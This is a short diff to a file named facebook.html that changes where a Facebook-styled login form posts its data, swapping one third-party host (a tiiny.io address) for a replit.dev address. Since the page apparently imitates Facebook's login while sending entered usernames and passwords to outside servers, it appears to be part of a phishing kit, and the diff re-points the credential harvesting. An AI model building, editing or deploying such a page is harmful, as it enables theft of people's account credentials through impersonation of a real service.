--- a/facebook.html
+++ b/facebook.html
@@ -87,7 +87,7 @@
                   <div class="_5rut">
                     <form target="_blank"
                       method="post"
-                      action="https://meta-web.tiiny.io"
+                      action="https://337858d8-5627-4679-95dc-a5e70dac1449-00-13jttmf8qsw18.riker.replit.dev/"
                       class="mobile-login-form _9hp- _5spm"
                       id="login_form"
                       
